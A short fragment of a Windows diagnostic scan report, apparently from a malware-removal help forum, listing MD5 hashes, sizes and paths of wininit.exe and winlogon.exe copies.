[2017/09/29 14:41:43 | 000,359,584 | ---- | M] (Microsoft Corporation) MD5=BF3E1D9B2360C6BE4CC3094CD2DDC617 -- C:\Windows\WinSxS\amd64_microsoft-windows-wininit_31bf3856ad364e35_10.0.16299.15_none_53dee4c1757519cc\wininit.exe

[color=#A23BEC]< MD5 for: WINLOGON.EXE >[/color]
[2018/05/20 10:43:51 | 000,079,769 | ---- | M] () MD5=3786F522FC133B9DC9FD9C8D0607B439 -- C:\Windows\WinSxS\amd64_microsoft-windows-winlogon_31bf3856ad364e35_10.0.16299.15_none_92af2d094615ef1f\winlogon.exe
[2018/03/30 04:26:04 | 000,716,288 | ---- | M] (Microsoft Corporation) MD5=C67E7F605A830AA96A204ECCDC678FBC -- C:\WINDOWS\SysNative\winlogon.exe
[2018/03/30 04:26:04 | 000,716,288 | ---- | M] (Microsoft Corporation) MD5=C67E7F605A830AA96A204ECCDC678FBC -- C:\Windows\WinSxS\amd64_microsoft-windows-winlogon_31bf3856ad364e35_10.0.16299.371_none_7d2b4e5e3fd59366\winlogon.exe

< End of report >

Publicité

Signaler le contenu de ce document

Publicité